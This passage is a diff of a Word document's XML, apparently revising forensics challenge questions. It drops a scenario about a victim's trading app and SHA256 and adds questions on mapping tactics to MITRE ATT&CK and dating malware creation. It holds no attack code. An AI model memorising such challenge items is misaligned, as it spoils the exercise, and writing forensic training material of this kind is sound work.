@@ -594,7 +596,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>financial</w:t>
+        <w:t>configuration</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -630,24 +632,6 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>movements</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t>and</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -666,7 +650,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>communication</w:t>
+        <w:t>map</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -684,26 +668,34 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>patterns</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:tab/>
+        <w:t>observed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>tactics</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to MITRE ATT&amp;CK.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -738,7 +730,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Based</w:t>
+        <w:t>Determining</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>creation</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -756,7 +766,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>on</w:t>
+        <w:t>time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -774,7 +802,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>accounts</w:t>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>provide</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -792,6 +838,132 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:t>insights</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>into</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>origin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>was</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>time</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>of</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -801,24 +973,6 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>witnesses</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -828,7 +982,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>and</w:t>
+        <w:t>malware</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -846,601 +1000,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>individuals</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>close</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>it</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>has</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>become</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>clear</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>that</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>was</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>interested</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>trading</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>This</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>has</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>led</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> him to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>invest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>all</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>his</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>money</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>acquire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>debt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Can </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>you</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>identify</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the SHA256 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>trading</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>application</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
